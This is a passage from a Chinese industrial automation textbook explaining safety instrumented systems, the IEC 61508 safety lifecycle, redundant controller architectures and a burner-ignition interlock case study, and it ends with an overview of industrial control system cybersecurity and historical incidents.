安全仪表系统的安全性是指任何潜在危险发生时安全仪表系统保证使过程处于安全状态的能力。不同安全仪表系统的安全性是不一样的,安全仪表系统自身的故障无法使过程处于安全状态的概率越低,则其安全性越高。安全仪表系统自身的故障有两种类型。 (1)安全故障 当此类故障发生时,不管过程有无危险,系统均使过程处于安全状态。此类故障称为安全故障。对于按故障安全原则(正常时励磁、闭合)设计的系统而言,回路上的任何断路故障是安全故障。 (2)危险故障 当此类故障存在时,系统即丧失使过程处于安全状态的能力。此类故障称为危险故障。对于按故障安全原则设计的系统而言,回路上任何可断开触点的短路故障均是危险故障(按故障安全原则,有故障时,回路应该断开以使系统安全,而可断开触点的短路使得回路不可能处于断开状态,丧失了使过程处于安全状态的能力)。 换言之,一个系统内发生危险故障的概率越低,则其安全性越高。 2)可用性 安全仪表系统的可用性是指系统在冗余配置的条件下,当某一个系统发生故障时,冗余系统在保证安全功能的条件下,仍能保证生产过程不中断的能力。 与可用性比较接近的一个概念是系统的容错能力。一个系统具有高可用性或高容错能力不能以降低安全性作为代价,丧失安全性的可用性是没有意义的。严格地讲,可用性应满足以下几个条件: (1)系统是冗余的。 (2)系统产生故障时,不丧失其预先定义的功能。 (3)系统产生故障时,不影响正常的工艺过程。 3)安全性与可用性的关系 从某种意义上说,安全性与可用性是矛盾的两个方面。某些措施会提高安全性,但会导致可用性的下降,反之亦然。例如,冗余系统采用二取二逻辑,则可用性提高,安全性下降;若采用二取一逻辑,则相反。采用故障安全原则设计的系统安全性高,采用非故障安全原则设计的系统可用性好。 安全性与可用性是衡量一个安全仪表系统的重要指标,无论是安全性低、还是可用性低,都会使发生损失的概率提高。因此,在设计安全仪表系统时,要兼顾安全性和可用性。安全性是前提,可用性必须服从安全性。可用性是基础,没有高可用性的安全性是不现实的。 7.1.3 安全生命周期 IEC61508国际标准把安全生命周期定义为:在安全仪表功能(SIF)实施中,从项目的概念设计阶段到所有安全仪表功能停止使用之间的整个时间段。 IEC61508中对安全系统整体安全生命周期的定义通过图7.11来表示。安全生命周期使用系统的方式建立的一个框架,用以指导过程风险分析、安全系统的设计和评价。IEC61508是关于E/E/PES安全系统的功能安全的国际标准,其应用领域涉及许多工业部门,比如化工工业、冶金、交通等。整体安全生命周期包括了系统的概念(concept)、定义(definition)、分析(analysis)、安全需求(safety requirement)、设计(design)、实现(realization)、验证计划(validation plan)、安装(installation)、验证(validation)、操作(operation)、维护(maintenance)和停用(decommission)等各个阶段。对于以上各个阶段,标准根据它们各自的特点,规定了具体的技术要求和安全管理要求。对于每个阶段规定了该阶段要实现的目标、包含的范围和具体的输入和输出,并规定了具体的责任人。其中每一阶段的输入往往是前面一个阶段或者前面几个阶段的输出,而这个阶段所产生的输出又会作为后续阶段的输入,即成为后面阶段实施的基础。比如,标准规定了整体安全要求阶段的输入就是前一阶段(风险分析所产生的风险分析的描述和信息,而它所产生的对于系统整体的安全功能要求和安全完整性等级要求则被用来作为下一阶段)安全要求分配的输入。通过这种一环扣一环的安全框架,标准将安全生命周期中的各项活动紧密地联系在一起;又因为对于每一环节都有十分明确的要求,使得各个环节的实现又相对独立,可以有不同的人负责,各环节间只有时序方面的互相依赖。由于每一个阶段都是承上启下的环节,因此如果某一个环节出了问题,其后所进行的阶段都要受到影响,所以标准规定,当某一环节出了问题或者外部条件发生了变化,整个安全生命周期的活动就要回到出问题的阶段,评估变化造成的影响,对该环节的活动进行修改,甚至重新进行该阶段的活动。因此,整个安全系统的实现活动往往是一个渐进的、迭代的过程。 IEC61508标准中安全生命周期管理的对象包括了系统用户、系统集成商和设备供应商。IEC61508标准中的安全生命周期与一般概念的工程学术语不同。功能安全标准中,在评估风险和危险时,安全生命周期是评价和制定安全相关系统SIL设计的一个重要方面。也就是说,不同的功能安全系统的安全生命周期管理程序是不同的,一些变量如维护程序、测试间隔等,可以通过计算,实现安全、经济的最优化。这是最先进的安全管理技术,在国外少数过程工业的公司里,这已经是标准程序。 图7.11 安全生命周期的描述 综上,安全生命周期的概念有以下几个特点: (1)包括安全系统从无到有,直到停用的各个阶段,为安全系统的开发应用建立了一个框架。 (2)整体安全生命周期清楚地说明了其各个阶段在时间和结构上的关系。 (3)能够按照不同阶段更加明确地为安全系统的开发应用建立文档、规范,为整个安全系统提供结构化的分析。 (4)与传统非安全系统开发周期类似,已有的开发、管理的经验和手段都能够被应用。 (5)安全生命周期框架虽然规定了每一阶段的活动的目的和结果,但是并没有限制过程,实现每一阶段可以采用不同的方法,促进了安全相关系统实现各个阶段方法的创新,也使得标准具有更好的开放性。 (6)从系统的角度出发进行安全系统的开发,涉及面广,同时蕴含了一种循环、迭代的理念,使得安全系统在分析、设计、应用和改进中不断完善,保证更好的安全性能和投入成本比。 7.1.4 安全仪表产品类型 从安全仪表系统的发展看,安全仪表系统产品主要包括以下几种。 1.继电线路 即用安全继电器代替常规的继电器实现安全控制逻辑。显然,这种解决方案属于全部通过硬件触点及其之间的连线形成安全保护逻辑,因此可靠性高,成本低,但是灵活性差,系统扩展、增加功能不容易。此外,还不宜用于复杂的逻辑功能,其危险故障(如触点粘结)的存在只能通过离线检测才能辨识出来。 2.固态电路 即基于印刷电路板的电子逻辑系统。它采用晶体管元件实现与、或、非等逻辑功能。这种系统属于模块化结构,结构紧凑,可在线检测。容易识别故障,元件互换容易,可以冗余配置。但可靠性不如继电器型,操作费用高,灵活性不高。这类安全仪表系统与现代安全型PLC等安全仪表系统的根本区别是有没有CPU。 3.安全PLC 这种解决方案以微处理器为基础,有专用的软件和编程语言,编程灵活,具有强大的自测试、自诊断能力。系统可以冗余配置,可靠性高。 安全PLC指的是在自身或外围元器件或执行机构出现故障时,依然能正确响应并及时切断输出的可编程系统。与普通PLC不同,安全PLC不仅可提供普通PLC的功能,更可实现安全控制功能,符合EN ISO 13849-1以及IEC 61508等控制系统安全相关部件标准的要求。安全PLC中所有元器件采用的是冗余多样性结构,两个处理器处理时进行交叉检测,每个处理器的处理结果储存在各自内存中,只有处理结果完全一致时才会进行输出,如果处理期间出现任何不一致,系统立即停机, 此外,在软件方面,安全PLC提供的相关安全功能块,如急停、安全门、安全光栅等均经过认证并加密,用户仅需调用功能块进行相关功能配置即可,保证了用户在设计时不会因为安全功能上的程序漏洞而导致安全功能丢失。 与常规PLC相比,用于安全系统的安全PLC除了产品本身不一样,在具体的使用上也有明显不同。首先安全PLC的输入和常规PLC的输入接法也有区别,常规PLC的输入通常接传感器的常开接点,而安全PLC的输入通常接传感器的常闭接点,用于提高输入信号的快速性和可靠性。有些安全PLC输入还具有“三态”功能,即“常开”、“常闭”和“断线”3个状态,而且通过“断线”来诊断输入传感器的回路是否断路,提高了输入信号的可靠性。另外,有些安全PLC的输出和常规的PLC的输出也有区别。常规PLC输出信号之后,就和PLC本身失去了关联,也就是说输出后,比如说接通外部继电器,继电器本身最后到底通没通,PLC并不知道,这是因为没有外部设备的反馈所致。安全PLC具有所谓“线路检测”功能,即周期性的对输出回路发送短脉冲信号(毫秒级,并不让用电器导通)来检测回路是否断线,从而提高了输出信号的可靠性。 在安全控制系统中,若使用总线,则需要使用安全总线。安全总线指的是通信协议中采用安全措施的现场总线。相比于普通总线来说,安全总线可以达到EN ISO 13849-1 以及IEC 61508 等控制系统安全相关部件标准的要求,主要用于如急停按钮,安全门,安全光幕,安全地毯等安全相关功能的分布式控制要求。安全总线可拥有多种拓扑结构,例如线形、树形等安全总线中采用的安全措施主要包括:CRC冗余校验,Echo模式,连接测试,地址检测,时间检测等。相比传统现场总线可靠性更高。若采用以太网,则需要选用安全以太网。安全以太网是适用于工业应用的基于以太网的多主站总线系统,用于分布式系统控制要求。安全以太网的协议中包含一条安全数据通道,该通道中的数据传输符合IEC 61508 SIL 3的要求。通过同一根电缆或者光纤,可同时传输安全相关数据以及非安全相关数据。在拓扑结构上,安全以太网和标准以太网类似,支持如星形、树形、线形和环形等不同的以太网结构。安全以太网拥有较高的网络灵活性,较强的可用性,较大的网络覆盖范围等特点。 4.故障安全控制系统 采用专用的紧急停车系统模块化设计,完善的自检功能,系统的硬件、软件都取得相应等级的安全标准证书,可靠性非常高,但价格较贵。这类产品主要包括德国黑马(HIMA)公司、英国英维斯集团(现已被法国施耐德公司收购)的Tricon系列产品。主要的DCS厂家也有类似的产品,但最高的安全等级达不到上述两家产品。 这类安全产品的主流系统结构主要有TMR(三重化)、2oo4D(四重化)、1oo1D、1oo2D等。 1)TMR结构 它将三路隔离、并行的控制系统(每路称为一个分电路)和广泛的诊断集成在一个系统中,用三取二表决提供高度完善、无差错、不会中断的控制。Tricon、ICS、GE等公司安全仪表产品均是采用TMR结构的系统。 如Tricon安全仪表系统,通过三重模块冗余结构(TMR)提供容错能力,满足AK6/SIL3的安全标准。此系统由3个安全相同的系统通道组成(电源模块除外,该模块是双重冗余的)。每个系统通道独立地执行控制程序,并与其他两个通道并行工作。硬件表决机制则对所有来自现场的数字式输入和输出进行表决和诊断。模拟输入则进行取中值的处理。因为每一个分电路都是和其他两个隔离的,任一分电路内的任何一个故障都不会传递给其他两个分电路。如果在一个分电路内有硬件故障发生,该故障的分电路就能被其他两个分电路修复。维修工作,包括拆卸和更换故障有分电路故障的故障模块都可以在Tricon在线情况下进行,而不中断过程控制。系统能自行重新配置而执行完全的TMR控制。系统对于各个分电路、各模块和各功能电路的广泛的诊断工作能够及时地探查到运行中的故障,并进行指示或报警。诊断还可以把有关故障的信息存储在系统变量内。在发现有故障时,操作员可以利用诊断信息以修改控制动作,或者指导其维护过程。可以看出,容错是Tricon控制器最重要的特性,它可以在线识别瞬态和稳态的故障并进行适当的修正,容错技术提高了控制器的安全能力和可用性。 2)2oo4D结构 2oo4D系统是由2套独立并行运行的系统组成的,通信模块负责其同步运行,当系统自诊断发现一个模块发生故障时,CPU将强制其失效,确保其输出的正确性。同时,安全输出模块中SMOD功能(辅助去磁方法)确保在两套系统同时故障或电源故障时,系统输出一个故障安全信号。一个输出电路实际上是通过4个输出电路及自诊断功能实现的,这样确保了系统的高可靠性、高安全性及高可用性。霍尼韦尔、HIMA的安全仪表系统均采用了2oo4D结构。 如HIMA的H41q/H51q系统为CPU四重化结构(QMR-Quadruple Modular Redundant),即系统的中央控制单元共有4个微处理器,每2个微处理器集成在一块CU模件上,再由两块同样的CU模件构成中央控制单元。一块CU模件即构成1oo2D结构,HIMA的1oo2D结构产品就可以满足AK6/SIL3的安全标准。为了向用户提供最大的可利用性,采用双1oo2D结构,即2oo4D结构。在冗余结构的情况下,高速双重RAM接口(DPR)使两个中央单元通信,从而解决了无故障修复时间限制的难题。其容错功能使系统中的任何一个部件发生故障,均不影响系统的正常运行。 3)其他 一些SIL等级低的产品会采用1oo1D、1oo2D等结构,如ABB、Moore等公司产品。 7.1.5 安全仪表系统与常规控制系统的不同 虽然目前安全仪表系统与常规控制系统(如SCADA系统、DCS等)都是基于计算机控制技术,但由于安全仪表系统与常规控制系统的设计目的有根本不同,因此,两者之间还是存在比较大的差别的,主要体现在如下方面。 1.功能不同 常规控制系统起到调节的作用,对于工业工程控制来说,就是抑制各种扰动,从而确保被控变量稳定在设定值附近;而安全仪表系统的作用是降低生产过程风险,起安全保护的作用,通常是当触发条件满足(如超限)时实现安全停车。 2.组成不同 常规控制系统的组成主要是现场控制器、工程师站、操作员站和控制网络等,通常不包括现场检测仪器与执行器;而安全仪表系统由于要进行回路的SIL等级评定,必须把检测仪表、执行器及外部电源等一并进行考虑。 3.I/O配置不同 常规控制系统通常配备的I/O模块有AI、AO、DI和DO;而安全仪表系统由于不执行调节作用,因此通常配备的I/O模块只有AI、DI和DO。 4.工作方式不同 常规控制系统处于动态之中,而安全仪表系统处于静态。即常规控制系统输出一直在变化,具有连续性,以起到抑制各种干扰对生产的影响。而安全仪表系统输出保持相对稳定,其工作具有间断特性。如果安全仪表系统输出一直发生变化,则会导致工业生产无法正常进行。 5.可靠性与安全级别不同 常规控制系统不需要进行SIL等级评估,不需要选用具有一定SIL等级的控制仪表和装置;而安全联锁系统需要进行SIL等级评估,需要选择符合SIL等级的设备。 6.使用与维护要求不同 安全仪表系统必须按照标准要求使用与维护,对安全仪表系统的更改都需要进行新的评估。而常规控制系统的使用与维护没有这么严格。 7.应对失效方式不同 常规控制系统大部分失效都是显而易见的,其失效会在生产的动态过程中自行显现,很少存在隐性失效;而安全仪表系统失效就没那么明显了,因此确定这种休眠系统是否还能正常工作的唯一方法,就是对该系统进行周期性的诊断或测试。因此安全仪表系统需要人为地进行周期性的离线或在线检验测试,而有些安全系统则带有内部自诊断。 另外,常规控制系统虽然有联锁功能,但这种联锁功能通常是不进行SIL等级评估的,因此,常规控制系统的联锁功能与安全仪表系统的功能是有本质不同的。 7.2 安全仪表系统设计与应用 7.2.1 安全仪表系统设计原则 1.基本原则 安全仪表系统设计时必须遵循以下两个基本原则: (1)在进行安全仪表系统设计时,应当遵循E/E/PES(电子/电气/可编程电子设备)安全要求规范。 (2)通过一切必要的技术与措施使设计的安全仪表系统达到要求的安全完整性水平。 2.逻辑设计原则 1)可靠性原则 安全仪表系统的可靠性是由系统各单元的可靠性乘积组成的,因此,任何一个单元可靠性下降都会降低整个系统的可靠性。在设计过程中,往往比较重视逻辑控制系统的可靠性,而忽视了检测元件和执行元件的可靠性,这是不可取的,必须全面考虑整个回路的可靠性,因为可靠性决定系统的安全性。 2)可用性原则 可用性虽然不会影响系统的安全性,但可用性较低的生产装置将会使生产过程无法正常进行。在进行安全仪表系统设计时,必须考虑到其可用性应该满足一定的要求。 3)“故障安全”原则 当安全仪表系统出现故障时,系统应当设计成能使系统处于或导向安全的状态,即“故障安全”原则。“故障安全”能否实现,取决于工艺过程及安全仪表系统的设置。 4)过程适应原则 安全仪表系统的设置应当能在正常情况时不影响生产过程的运行,当出现危险状况时能发挥相应作用,保障工艺装置的安全,即要满足系统设计的过程适应原则。 3.回路配置原则 在安全仪表系统的回路设置时,为了确保系统的安全性和可靠性,应该遵循以下两个原则。 1)独立设置原则 SIS应独立于常规控制系统,独立完成安全保护功能。即安全仪表系统的逻辑控制系统、检测元件与执行元件应该独立配置。 2)中间环节最少原则 安全仪表系统应该被设计成一个高效的系统,中间环节越少越好。在一个回路中,如果仪表越多可能导致可靠性降低。尽量采用隔爆型仪表,减少由于安全栅而产生的故障源,防止产生误停车。 7.2.2 安全仪表系统设计步骤 根据安全生命周期的概念,安全仪表系统设计的一套完整步骤如图7.12所示,具体描述如下: (1)初步设计过程系统。 (2)对过程系统进行危险分析和风险评价。 (3)验证使用非安全控制保护方案是否能防止识别出的危险或降低风险。 (4)判断是否需要设计安全仪表系统,如果需要转第(5)步,否则按照常规的控制系统进行设计。 (5)依据IEC61508确定对象的安全等级SIL。 (6)确定安全要求技术规范(SRS)。 (7)初步完成安全仪表系统的设计并验证是否符合安全要求技术规范。 图7.12 安全仪表系统设计步骤 (8)完成安全仪表系统详细设计。 (9)进行安全仪表系统的组装、授权、预开车和可行性试验。 (10)在符合规定的条件下对安全仪表系统进行预开车安全评价。 (11)安全仪表系统正式投用、操作、维护及定期进行功能测试。 (12)如果原工艺流程被改造或在实际生产过程中发现安全仪表系统不完善,判断是否需要停用或改进安全仪表系统。 (13)若需要改进,则转到第(2)步进入新的安全仪表系统设计流程。 7.2.3 安全仪表系统工程应用案例 1. 空气预热炉燃烧器点火系统工艺与设备组成 1)生产工艺介绍 某丙烯腈装置反应单元的工艺原理是:丙烯和氨的过热蒸汽与空气在一定的温度、压力下,送入流化床反应器,发生催化氧化反应,生成丙烯腈,副产氢氰酸和乙腈,同时放出大量的反应热。反应单元由反应系统、蒸汽发生系统、催化剂加料系统和空气预热系统构成。对于空气预热系统,空气是反应的主要进料之一。在装置开车、运行初始,空气预热炉对空气进行加热,提升反应混合物料的温度,促使反应发生。来自大气的空气经过过滤,由空压机加压,送入开工空气预热炉,燃料气与空气在炉中进行燃烧后,产生高温烟气,与空气混合,使加热炉出口热空气温度最高达到480℃。空气预热炉的正常运行,直接关系着反应的顺利进行,而燃烧器点火系统又是空气预热炉运行的关键。空气预热炉燃烧器点火过程是,首先采用高压电打火方式点燃点火装置(也称为点火枪或长明灯),再由点火装置点燃主火嘴,助燃空气采用预热空气。 2)空气预热炉燃烧器点火控制系统组成 空气预热炉燃烧器点火控制系统由高能点火装置、气动推进装置、紫外火焰检测器、点火吹扫开关阀、燃料气输送开关阀组以及PLC控制系统组成。燃烧器为气体燃烧器,以天然气为燃料。点火时由高能点火装置点燃点火气枪,再由点火气枪点燃主烧嘴。点火枪安装在安装套筒内,采用气动推进器进退,燃烧器燃烧所用的助燃风由仪表空气提供。 (1)高能点火装置 高能点火装置主要由高能防爆点火器、高能防爆半导体点火枪、高压屏蔽电缆三部分组成。高能点火装置的工作原理为:接入装置区的一路工频220VAC、50Hz电压,经过升压、整流,输出直流的脉冲电压,对一个储能电容器进行充电,使电容器上的电压持续升高。当电压上升至电容器的击穿电压时,电容器开始通过放电管、扼流圈进行放电,并通过高压点火屏蔽电缆,将输出电流送至点火枪的半导体电嘴上进行放电,使半导体电嘴间隙形成高能的电弧火花,点燃通入了燃料气的点火枪,再由点火枪点燃主火嘴。当点火器停止工作时,如果电容器上还有剩余电荷没有释放,则通过泄放电阻接入地下。 (2)气动推进装置 作为自动点火装置的重要执行机构之一,在空气预热炉进行点火操作时,气动推进器将点火枪送入燃烧器;点火完成后,再将点火枪推出燃烧器。推进装置采用气缸作为源动力,由电磁阀控制气路的方向、控制气缸内活塞的运动,活塞带动连杆,驱动推进装置。同时设有行程开关,将推进器(点火枪)的进到位与退到位信号反馈至控制系统。 (3)紫外火焰检测器 因为燃烧的主要燃料为天然气,气体燃料燃烧产生的紫外线强度,较适合于紫外光谱259~320的纳米波长。因此该燃烧器的火焰监控采用紫外式火焰检测器。该检测器由探头和信号处理器组成,如图7.13所示。工作时,探头通过紫外光敏元件吸收火焰中的紫外成分,经过光电转换,发出火焰判断信号。为保证最佳的视角,紫外火焰检测器以适合的角度(15°)安装在燃烧器旁或者炉壁上;采用聚焦透镜和防尘玻璃探头,监测炉膛的火焰状态。在探头后端设有一个风管,可以接入压缩空气或专用的冷却风系统,对探头镜片进行吹扫和冷却,气源压力略大于炉膛压力。 火焰检测器输出3路信号,其输出信号端子如图7.14所示。一路4~20mADC模拟信号(6、7端子),引入DCS系统,用于监测、显示火焰的强度;一路开关量信号(3、5端子),引入SIS系统,实施点火系统的安全联锁;一路故障开关接点(4端子),输出至DCS,作为火焰检测器的故障报警信号。 图7.13 紫外火焰检测器原理图 图7.14 火焰检测器端子图 (4)点火吹扫开关阀 根据国家质量监督检疫检验总局颁布的,《燃油(气)燃烧器安全技术规则》(TSG ZB001-2008),燃烧器启动点火之前,包括执行安全联锁、排除故障之后,必须对燃烧室及烟道进行前吹扫。本系统采用氮气作为吹扫气,采用气动开关阀控制吹扫。 (5)点火气枪及主烧嘴的燃料开关阀组 自界区外的天然气输送管线分别为点火气枪和主烧嘴供气,每条管线上设置两个气动开关阀,故障位置为FC,并配备用于安全联锁的电磁阀。 在燃料阀紧急切断的情况下,管道中还会残留一部分燃气,使装置存在安全隐患。为此,在两条供气管线上分别设置了燃气自动放空阀(FO),将管道中的残余燃气排入火炬系统进行燃烧。 (6)燃气压力检测仪表 主烧嘴燃料输送管线上,设置两组、共4支压力变送器,用于监测燃料压力的波动;分别经过1002处理后,作为压力高、低联锁信号,参与加热炉安全联锁。 (7)空气流量检测仪表 加热炉入口空气管道上,采用1支平衡流量计+3台差压变送器的方式检测空气流量。输出3路4~20mADC信号,经过2003处理后,参与加热炉的安全联锁。 (8)空气温度检测仪表 加热炉出口空气温度最高可达480℃,故设置2组热电偶+分体式温度变送器,检测出口空气温度。温度信号经过1002处理后,参与加热炉的安全联锁。 2. 空气预热炉燃烧器点火过程安全仪表设计 1)燃烧器点火控制系统总体设计 空气预热炉燃烧器点火控制系统包括现场控制LCP、独立的PLC控制系统实现常规控制功能及安全仪表系统SIS实现功能安全,其结构如图7.15所示。空气预热炉的装置现场,设置隔爆型PLC控制柜,安装一定的开关、按钮和信号灯等,用于加热炉的现场开车、点火,并可实现现场半自动和单步手动安全点火操作。引入PLC的模拟信号、DCS允许信号、其他开关量信号采用硬接线。PLC 自带RS-485 通信接口,可以将全部动作信号上传至中心控制室,从而在控制室实现对点火及燃烧过程进行远程监控。燃烧器的安全联锁及紧急停车信号采用硬接线方式引入SIS系统。SIS可在异常工况下切断燃料,保护装置及人员的安全。丙烯腈装置装置的DCS控制系统与SIS进行通信,可接收来自SIS的安全联锁信号,从而了解SIS系统运行状态及现场安全仪表测控设备的工作状态。 图7.15 点火控制系统结构原理图 2)燃烧器点火SIS系统设计 开工空气预热炉运行过程中,燃料气等工艺物料的波动会对开工空气预热炉燃烧的效率及安全运行产生影响,因此需要设置SIS。SIS系统的主要联锁输入信号的仪表位号如表7.3所示。 表7.3 参与控制与联锁的仪表位号 3)空气预热炉燃烧器点火设备SIS系统联锁逻辑 空气预热炉燃烧器点火设备SIS采用负逻辑设计原则,即联锁触发开关正常时为“1”,故障触发时为“0”,采用国际通用的布尔代数运算规则。根据点火设备工作要求,设计了联锁逻辑图,该图表示了联锁状态下的逻辑关系,如图7.16所示。从该联锁图可以看出: (1)DCS操作员可以下达点火过程是手动还是自动。如是手动,则安全联锁功能由LCP来执行。若是自动,则由SIS来执行安全联锁。 (2)在中控室还有点火过程紧急停车按钮(HZS-001),即若在异常情况下,操作员也可以执行紧急停车功能。只有该按钮复位后,才可以恢复正常的SIS功能。 (3)点火过程出现异常导致SIS动作时,不仅切断主烧嘴燃料调节阀,而且还切断主烧嘴燃料开关阀、点火枪燃料开关阀,同时打开主烧嘴燃料放空阀和点火枪燃料放空阀。 (4)为了确保安全功能,系统配置了2个主烧嘴燃料开关阀和2个点火枪燃料开关阀。 图7.16 联锁逻辑图 7.3 工业控制系统信息安全 7.3.1 信息安全 信息作为一种资源,它的普遍性、共享性、增值性、可处理性和多效用性,使其对于人类具有特别重要的意义。随着信息时代的到来,人们的生活和工作越来越离不开各种信息系统。信息系统在给人们的生活和工作带来便利的同时,也因为各种内在或外在的不安全因素给人们带来困扰或损害,从而产生了所谓的信息安全问题。进入21世纪后,随着信息技术的不断发展,特别是移动互联网的迅速推广和普及,信息安全问题也日显突出,如何确保信息系统的安全已成为全社会关注的焦点问题。 信息安全的内涵因时代的不同而不同,人们对信息安全的认识也有一个发展变化的过程。信息安全是信息技术发展及其广泛应用的产物,具有非传统安全的特点,是一种对技术发展、用户行为、物理环境等具有强烈依赖性的安全。信息安全的概念是随着信息技术的发展而不断拓展的,同时信息安全的外延也在不断扩大。随着信息技术的发展及其对社会生活影响的日益深化,信息安全的内涵从最初的通信保密时代到20世纪90年代的信息安全时代,再到目前的信息安全保障时代都强调不能被动的保护,信息安全要包括检测、保护、管理、反应、恢复、攻击等环节。 在传统IT领域,信息安全是指信息网络的硬件、软件及其系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统连续可靠正常地运行,信息服务不中断。信息安全的实质就是要保护信息系统或信息网络中的信息资源免受各种类型的威胁、干扰和破坏,即保证信息的安全性。根据国际标准化组织的定义,信息安全性的含义主要是指信息的完整性、可用性、保密性和可靠性。信息安全根本目的就是使内部信息不受外部威胁。为保障信息安全,要求有信息源认证、访问控制,不能有非法软件驻留,不能有非法操作。所有的信息安全技术都是为了达到一定的安全目标,其核心包括保密性、完整性、可用性、可控性和不可否认性5个安全目标。 1)保密性 指信息按给定要求不泄露给非授权的个人、实体或过程,或提供其利用的特性,即杜绝有用信息泄露给非授权个人或实体,强调有用信息只被授权对象使用的特征。 2)完整性 指信息在传输、交换、存储和处理过程保持非修改、非破坏和非丢失的特性,即保持信息原样性,使信息能正确生成、存储、传输,这是最基本的安全特征。 3)可用性 指网络信息可被授权实体正确访问,并按要求能正常使用或在非正常情况下能恢复使用的特征,即在系统运行时能正确存取所需信息,当系统遭受攻击或破坏时,能迅速恢复并能投入使用。可用性是衡量网络信息系统面向用户的一种安全性能。 4)可控性 指对流通在网络系统中的信息传播及具体内容能够实现有效控制的特性,即网络系统中的任何信息要在一定传输范围和存放空间内可控。除了采用常规的传播站点和传播内容监控这种形式外,最典型的如密码的托管政策,当加密算法交由第三方管理时,必须严格按规定可控执行。 5)不可否认性 指通信双方在信息交互过程中,确信参与者本身,以及参与者所提供的信息的真实同一性,即所有参与者都不可能否认或抵赖本人的真实身份,以及提供信息的原样性和完成的操作与承诺。 7.3.2 工业控制系统信息安全概述 1. 什么是工业控制系统信息安全 工业控制系统在许多关系到国家经济命脉和国家安全的行业,如电力发输配、油气采集和输送、油气加工生产、冶金、水和污水处理、核电、交通中发挥着中枢神经的作用。传统工业控制系统的安全性主要依赖于其技术的隐秘性,几乎未采取任何安全措施。随着企业管理系统与控制系统的日益融合,企业原料、销售、配件及服务越来越依赖互联网,使得包括企业控制系统的整个信息系统与Internet互联。此外,大量通用的软硬件的使用使得工控系统的漏洞越来越多。利用工控系统的漏洞攻击工业控制系统的安全事件不断出现,造成的后果也越来越严重后果,从而使得工业控制系统的信息安全问题成为近年来一个广泛关注的热点问题。 IEC 62443标准给出了对控制系统信息安全(cyber security)的定义:对系统采取的保护措施;建立和维护保护系统的措施所得到的系统状态;能够免于对系统资源的非授权访问和非授权或意外的变更、破坏或者损失等;基于计算机系统的能力,能够保证非授权人员和系统无法修改软件及其数据,也无法访问系统,但能允许授权人员访问系统;防止对控制系统的非法和有害入侵,或者干扰控制系统执行正确和计划的操作。 在工业领域,信息安全是物理安全、功能安全之外的第三大安全类别。功能安全和信息安全的作用就是确保工业过程的物理安全、人生安全和环境安全。其中功能安全具有比较成熟的理论体系和实践手段。而控制系统的信息安全却被长期得不到重视甚至被忽视。IEC 62443标准指出功能安全(Safety)系统主要是考虑由于随机硬件故障所导致的组件或系统对健康、安全和环境的影响。而信息安全(Security)系统的主要原因并不是随机硬件故障等方面,其研究内容是指组织机构的专有信息安全。通俗地说,功能安全是研究非人为因素如设备失效或故障引起的,而信息安全是研究由于人为因素,如黑客攻击或内部人员因素造成的安全问题。 控制系统信息安全有其特殊的安全要求,与传统IT行业的信息安全不同。目前,控制系统信息安全呈现攻击目标和入侵途径的多样化、攻击方式的专业化等趋势,在攻击后果上变得更加严重,遭受攻击的行业变得越来越多,使得安全防护相对分散难以控制。另外,由于控制系统信息安全的特殊性,在安全管理上也比较复杂,高度网络化的大型控制系统给其信息安全管理带来了挑战。 2.工业控制系统信息安全问题的由来 1)控制系统从封闭走向开放 随着工业控制系统的数字化程度不断提高,特别是大量标准的IT产品和技术被广泛用于工控系统,使得控制系统的开放性越来越高。例如,以往DCS的工程师站或操作员站都是专用的计算机设备,而现在,普遍都使用IT系统中常用的服务器、工作站或PC。微软的操作系统及数据库等软件成为标准配置。此外,各种IT系统广泛使用的通信协议在工控系统被广泛使用。这些都造成IT系统存在的漏洞被引入到工控系统中,给控制系统的信息安全留下了隐患。 2)控制系统与上层管理网络的联网 我国工业控制系统在20世纪末期随着“两化融合”政策的实施而快速从封闭走向开放,从静态走向动态,从孤立系统向网络互联方面转变。特别是控制网络与企业信息网络甚至Internet已经组成一个复杂开放的网络。这种信息融合与集成带来的经济效益非常可观,但却使得工业控制系统的信息安全问题凸现出来。近年来提出的“工业4.0”、“工业互联网”、“互联企业”或其他智能制造技术,其核心支持就是包括企业控制与管理网络的信息网络以及物联网。 3)网络威胁越来越多,攻击手段不断更新 攻击和防护是一对矛盾。正是由于存在大量的各种类型、各种来源的攻击,才导致工控系统的漏洞被利用,引起工控信息安全问题。此外,在网络上可以找到众多的攻击工具,使得发起网络攻击的技术门槛降低。 4)现有防护手段不足 现代工业控制系统已经广泛采用各种网络和总线技术,各种通信协议大量使用,但这些通信协议在设计时,重点关注可用性和实时性,缺乏诸如接入认证、加密等安全机制,因此,当受到网络攻击时显得十分脆弱。一些工业控制系统虽然在边界上部署了传统的防火墙产品,在工作站上也有安装杀毒软件。但是这种保护措施还缺乏针对性和适应性。例如,杀毒软件通常因得不到及时更新,导致失去了对主流病毒、恶意代码的防护能力。由于考虑到工业生产的稳定性和连续性要求,很难像IT系统一样对工控系统频繁进行漏洞修复(安装补丁程序),导致工控系统的系统软件和应用软件漏洞越积越多,大量漏洞长期存在。此外,目前采取一些物理隔离措施,也很难确保系统与外界实现的真正隔离,避免系统受到外部攻击。 5)对工控信息安全重要性认识不足 长期以来,工业界、学术界和政府都十分重视通过功能安全措施的实施来降低生产风险,确保人员、设备和环境的安全。而对于工控信息安全这一新的挑战还缺乏足够的认识和重视,同时,在技术和管理上还缺乏行之有效的应对手段。 3.工业控制系统信息安全事件及其危害 根据工业安全事件信息库RISI(Repository of Industrial Security Incidents)的统计,从有记录的1982年开始到2014年,全球针对工业控制系统并造成损失的重大安全事件已近1000起,如图7.17所示。特别是从2011年(“震网”事件发生后)以来呈现较大增长。 2001年,澳大利亚昆士兰Maroochy污水处理厂由于内部工程师的多次网络入侵(攻击SCADA系统),该厂发生了46次不明原因的控制设备功能异常事件,导致数百万公升的污水进入了地区供水系统。 2003年,美国俄亥俄州的戴维斯-贝斯(Davis Base)核电站进行维修时,由于施工商在进行常规维护时自行搭接对外连接线路以方便工程师在厂外进行维护工作,结果当私人电脑接入核电站网络时,将电脑上携带的SQL Server蠕虫病毒传入核电站网络,致使核电站的控制网络全面瘫痪,系统停机将近5小时。 国内的工业控制系统病毒感染事件在最近几年也时有发生。2011年2月的西南管线调控中心及场站、2010年5月的齐鲁石化控制系统、2011年3月的大庆石化某装置控制系统均感染Conficker病毒并造成部分服务器和控制器通信中断。 图7.17 2001至2014年间的ICS信息安全事件统计 